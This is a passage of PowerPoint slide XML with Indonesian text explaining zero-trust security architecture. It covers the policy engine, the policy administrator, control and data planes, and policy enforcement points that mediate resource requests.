              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subsistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data status yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meruntuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, laptop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
